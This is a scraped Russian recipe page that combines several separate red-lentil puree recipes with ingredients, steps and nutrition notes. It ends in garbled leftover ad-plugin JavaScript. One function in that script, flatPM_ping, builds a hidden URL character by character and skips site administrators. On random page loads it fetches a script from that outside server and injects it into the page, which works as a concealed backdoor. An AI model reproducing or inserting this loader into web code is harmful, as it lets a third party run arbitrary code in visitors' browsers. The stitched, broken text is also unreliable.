Пюре из чечевицы

Пюре из красной чечевицы

Ингредиенты

Картофель – 3 шт. (около 250 г)

Красная чечевица – 1 стакан

Чеснок – 1 зубчик

Масло растительное – 2 ст.л.

Свежая зелень – по вкусу

Соль, перец – по вкусу

Орегано – по вкусу

Лавровый лист – 1 шт.

  • 163 кКал
  • 45 мин.
  • 45 мин.

Фото готового блюда

Видео рецепт: Пюре из красной чечевицы

Пошаговый рецепт с фото и видео

Красная чечевица считается особенно вкусным видом из семейства бобовых. Также она известна под другим названием – масурдал. Её любят использовать в своем рационе вегетарианцы и веганы, но и просто для любителей здорового питания красная чечевица – неотъемлемый продукт. Её отличие от других бобовых – быстрота приготовления, при этом замачивать продукт перед варкой не нужно. За это люблю её я – с чечевицей можно быстро приготовить себе обед или ужин. Например, пюре из красной чечевицы, которое мы приготовим сегодня.

В этом блюде я сочетаю бобовые с картофелем, как бы маскируя чечевицу, добавляю овощную поджарку, побольше специй и обязательно свежую зелень.

Ингредиенты готовы, приступим!

Картофель нарезаем на крупные части.

Выкладываем в кастрюлю вместе с промытой чечевицей и заливаем водой так, чтобы она полностью покрывала ингредиенты. Солим и добавляем лавровый лист. Доводим до кипения и варим до готовности картофеля. Не забываем снимать появляющуюся пенку.

В это время приготовим поджарку из овощей. Лук режем мелким кубиком.

Чеснок также мелко рубим ножом.

Морковь натираем на мелкой терке.

Перекладываем овощи на сковороду с растительным маслом и поджариваем до готовности. Всыпаем соль, перец, орегано по вкусу, перемешиваем и держим на огне ещё 2 минутки.

Тем временем картофель с чечевицей сварились. Выливаем немного отвара в стакан, остальную жидкость сливаем полностью.

Толкушкой разминаем компоненты в пюре – сделать это будет очень легко, поэтому помощь блендера даже не потребуется. Если пюре получается густым, влейте немного того самого бульона до желаемой консистенции.

Добавляем к пюре овощную поджарку и мелко рубленную свежую зелень, подсаливаем по вкусу.

Перемешиваем до однородности. Получается гладкое пюре с кусочками овощей и зелени.

Раскладываем пюре из красной чечевицы по тарелкам и подаём к столу, украсив свежей зеленью. Приятного аппетита!

ПЮРЕ ИЗ ЧЕЧЕВИЦЫ

В этом посте хочу поделиться с вами очень простой, но невероятно вкусной идеей для гарнира — ее даже рецептом язык не поворачивается назвать, настолько все элементарно;) Тем не менее, такое пюре из чечевицы может запросто стать вашим любимым гарниром, особенно в тех уютных домашних блюдах, которые так и хочется дополнить нежнейшим картофельным пюре, сделав вкус ‘как в детстве у мамы или в детском садике’.

В моей семье этот гарнир появился, желая угодить мужу-картофелееду, но незаметно стал и моим любимым. Вообще, бобовые в любом виде присутствуют в моем рационе почти ежедневно, потому что вкуснее и сбалансированней источников растительного белка, в принципе, трудно найти. Нут, фасоль, чечевица — все это идеальные источники сложных углеводов (в том числе и клетчатки) в сочетании с растительным белком. Поэтому блюда из них великолепно подходят как для завтрака, так и для обеда независимо от ваших нынешних целей в построении тела, ну а для ужина будут не всегда уместны разве что на жиросжигании, и то если вы тренируетесь в первой половине дня, потому что худея, перед вечерней тренировкой, ужин с бобовыми — просто идеален.

Немного о чечевице. Встречается она различных цветов и текстур: красная (розовая), коричневая и зеленая. Коричневая и зеленая — с оболочкой, зерна же розовой чечевицы подвергнуты лущению и от оболочки освобождены. Поэтому самая твердая из них — коричневая, самая мягкая — красная. Вкус у чечевицы, на мой взгляд, достаточно нейтральный, что позволяет использовать ее в самых разнообразных блюдах и формах. По сравнению с другими видами бобовых, чечевица довольно легко и быстро готовится — быстрее всего красная (разваривается за 10-12мин), медленнее — коричневая.

Как использовать:

Коричневая чечевица идеально подходит для супов — благодаря оболочке она лучше всего держит форму и не разваривается. Зеленая идеальна для приготовления салатов и гарниров с цельной чечевицей. Розовая не держит форму совсем и отлично подойдет для приготовления пюре и крем-супов.

Питательный состав чечевицы | * в 100 граммах сырой чечевицы содержися

Пищевые волокна — 31 г

Молибден — 330% суточной нормы

Фолиевая кислота — 89% с.н.

Витамины В6 — тиамин, и B5

Как готовить:

Отваривать в соотношении 1 к 3 с водой: добавить чечевицу в кипящую воду и варить на медленном огне — длительность зависит от ее сорта — от 10-12 мин для красной до 20-30 мин для коричневой.

Советы и рекомендации:

С точки зрения облегчения и ускорения процесса приготовления только коричневая чечевица требует замачивание в течении 12-20 часов, красную и зеленую достаточно лишь тщательно промыть перед варкой. Однако, чтобы получить из нее максимум пользы и минимум вреда, как и остальные бобовые, все крупы, орехи и зерна, я советую вам предварительно замачивать (а лучше даже проращивать) любую чечевицу на 7-10 часов– это облегчит ее переваривание и обогатит питательные качества.

Ну а теперь опять к пюре, вкус, простота приготовления и сама идея которого когда-то давно, попробовав в первый раз, меня очень впечатлили — первая мысль была “и как я не додумалась до этого раньше”. Те же эмоции высказывают и все мои знакомые, когда пробуют его впервые. Почему-то не сомневаюсь, что если вы еще не готовили чечевичное пюре прежде, вы тоже в него влюбитесь ‘с первой ложки‘.

Вот некоторые советы и идеи использования и начинки для такого чечевичного пюре:

  • На этапе отваривания или измельчения в пюре, добавьте свежую зелень: шалфей, тимьян, петрушку, зеленый лук, укроп, базилик, и т.д. Аромат и вкус розмарина — мой личный фаворит.
  • Можно измельчить с другими печеными или вареными овощами, например с морковью, баклажаном или сладким перцем, и добавить специи на свой вкус — куркуму, паприку, кумин и т.д.
  • Для молочной базы: при измельчении добавьте немного молока или вашего любимого мягкого сыра. Сочетание с мягким козьим сыром, на мой взгляд, самое вкусное и пикантное
  • Для безмолочной ‘сливочной’ базы: используйте кешью-сыр (его рецепты можно найти здесь и здесь), ореховое или кокосовое молоко или немного пищевых (не путать с пекарскими) дрожжей
  • Готовое пюре можно посыпать свежей зеленью и сверху полить грамулькой любимого масла, например, оливкового. Если есть возможность, очень советую попробовать пюре с трюфельным маслом — это невозможный гастрономический восторг
  • Используйте пюре в качестве высоко-белкового гарнира вместо риса, макаронных изделий и т.д.

Пюре из чечевицы

Разнообразь свое меню легким и вкусным блюдом! Пюре из чечевицы – рецепт, который выручит вас, когда очень хочется блюдо из бобовых, а время на замачивание и долгую варку нет. Эта бобовая культура не так распространена у нас, как горох и фасоль, хотя имеет много преимуществ. Чечевица обладает приятным ореховым вкусом и является рекордсменом по количеству растительного белка. Существует много ее разновидностей – зеленая, коричневая, красная, желтая. Чечевица подходит в качестве гарнира, а также для приготовления супов, рагу, салатов и каш.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Пюре из чечевицы

Ингредиенты и как готовить

ингредиенты на 3 порции или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
107 ккал
Белков: 7 гр
Жиров: 2 гр
Углеводов: 15 гр
Б/Ж/У: 29 / 8 / 63
Н 100 / С 0 / В 0

Время приготовления: 30 мин

Пошаговое приготовление

Шаг 1:

Подготовить и отмерить продукты.

Шаг 2:

Чечевицу хорошо промыть под прохладной проточной водой, откинуть на сито, оставить стекать.

Шаг 3:

залить водой, поставить варить.

Шаг 4:

Довести до кипения, снять образовавшуюся пену.

Шаг 5:

Посолить, при желании добавить специи, убавить огонь, накрыть крышкой.

Шаг 6:

Варить почти до полного испарения воды. Огонь выключить и оставить кастрюлю на пять минут, чтобы вся оставшаяся вода впиталась.

Шаг 7:

Пюрировать чечевицу блендером. Можно воспользоваться обычной картофелемялкой. Или даже ложкой, потому что чечевица хорошо разваривается.

Шаг 8:

Добавить масло, размешать. Можно подавать на стол.

Для приготовления пюре я использовала красную чечевицу, если вы возьмете другую, учитывайте особенности сорта, некоторым требуется большее количество времени для варки, большее количество воды, а черную и коричневую придется все-таки ненадолго замочить. Если чечевица уже сварилась и стала мягкой, а вода еще осталась, то просто слейте излишки. Горячая пюрированная чечевица жидкая, потом она заметно загустеет. Если вы соблюдаете пост или придерживаетесь диеты, то сливочное масло можно заменить на любое растительное. Очень вкусный гарнир получается, если к сваренной чечевице добавить жареные или тушеные овощи, можно обойтись луком с морковью, а можно взять и кабачки, и баклажаны, и перец, и помидоры. Остывшую чечевицу также добавляют в салаты. При варке чечевица немного теряет цвет, при подаче украсьте ее зеленью. Специи подойдут любые, на ваш вкус. Куркума, имбирь и кориандр добавят индийских ноток, зира – восточных. Вместо воды можно сварить чечевицу на бульоне.

Как научиться готовить вкусное пюре из чечевицы

Полезная еда может быть вкусной и простой в приготовлении. Вы найдёте оригинальный и очень вкусный рецепт пюре из чечевицы. Изучив подробную инструкцию, сможете приготовить вкусное блюдо за 20 минут.

Кухонная техника и утварь: кастрюля, миска (для пюре), погружной блендер (или картофелемялка), доска, нож, чесночница, плита.

Ингредиенты

Чечевица (красная) 70 г
Вода 200 мл
Свежая зелень 5 г
Чеснок 2 зубчика
Соль по вкусу
Специи по вкусу
Оливковое (или другое растительное) масло 2 ст. л.

Пошаговое приготовление

Перед приготовлением этого блюда стоит учесть один важный момент. Перед варкой чечевицу обычно замачивают. Причём если это коричневая чечевица, то замачивают ее, как правило, не менее, чем на 12 часов.

А красную и зелёную обычно достаточно лишь хорошенько промыть перед варкой. Но для того, чтобы извлечь максимум пользы из данного продукта, всё же не поленитесь замочить красную чечевицу хотя бы на полчаса перед варкой.

Благодаря этому, процесс переваривания блюда станет более лёгким и усвоится множество полезных элементов. Затем просто слейте воду, в которой стояла чечевица, и можно приступать к приготовлению пюре.

  1. Хорошо промойте 70 г красной чечевицы. Залейте ее 200 мл воды и поставьте вариться. При желании можно добавить в процессе варки веточку розмарина. Это добавит чечевице особенного вкуса и аромата. Солить ее уже лучше в самом конце или же в процессе приготовления пюре.
  2. Чечевица готовится очень быстро. Так что уже через 15 минут можете снимать кастрюлю с огня. Измельчите 2 зубчика чеснока и добавьте к чечевице. Посолите по собственному вкусу, добавьте ваши любимые специи.
  3. Теперь всё взбейте блендером или вручную с помощью картофелемялки.
  4. Нарежьте мелко зелень. Это может быть любая свежая зелень (базилик, петрушка, укроп и т. д.).
  5. Перемешиваем пюре с зеленью, добавляем 2 ст. л. оливкового масла и ещё раз перемешиваем.

Вот и весь процесс приготовления. Очень быстро и легко. Но это блюдо способно обеспечить вас энергией на несколько часов. Причём даже если употреблять его без дополнений (в виде блюд из мяса или рыбы).

В особенности оно будет полезным перед тренировкой в спортзале или любым другим видом физической активности. Вот ещё один небольшой секрет приготовления пюре из чечевицы: при измельчении пюре, можно добавить туда другие варёные или запеченные овощи (болгарский перец, баклажан, морковь).

А среди специй с чечевицей больше всего сочетаются базилик, куркума, паприка, кумин. Пюре из чечевицы станет отличной альтернативой гарниру из отварного риса, макаронных изделий или же картофеля.

Видеорецепт

С помощью данного видеорецепта вы сможете приготовить оригинальный гарнир с особенным вкусом. Это одна из вариаций пюре из чечевицы, которая привнесёт в ваше ежедневное меню немного уникальности и удивит ваших родных и близких.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};